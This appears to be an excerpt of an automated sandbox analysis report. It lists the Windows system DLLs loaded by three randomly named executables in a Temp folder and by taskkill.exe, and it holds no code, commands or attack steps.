Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
